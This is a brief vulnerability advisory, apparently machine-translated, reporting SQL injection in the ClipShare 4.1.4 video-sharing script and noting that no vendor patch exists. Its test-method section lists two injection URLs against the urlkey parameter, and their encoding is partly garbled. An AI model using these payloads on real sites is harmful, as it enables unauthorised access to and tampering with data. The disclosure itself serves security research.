Release date:
Updated on: 2013-03-15
Affected Systems:
Clipshare ClipShare
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58479
ClipShare is a script to enable the video sharing community website.
ClipShare 4.1.4 and other versions have security vulnerabilities. Attackers can obtain sensitive information, damage applications, and access or modify data.
<* Source: Akastep
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/ugroup_videos.php? Urlkey = 1 & #39; order by 14 -- 3 = & #39; 3
Http://www.example.com/ugroup_videos.php? Urlkey = 1 & #39; or (select if (5 = 5, 0, 3) -- 3 = & #39; 3
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Clipshare
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.clip-share.com/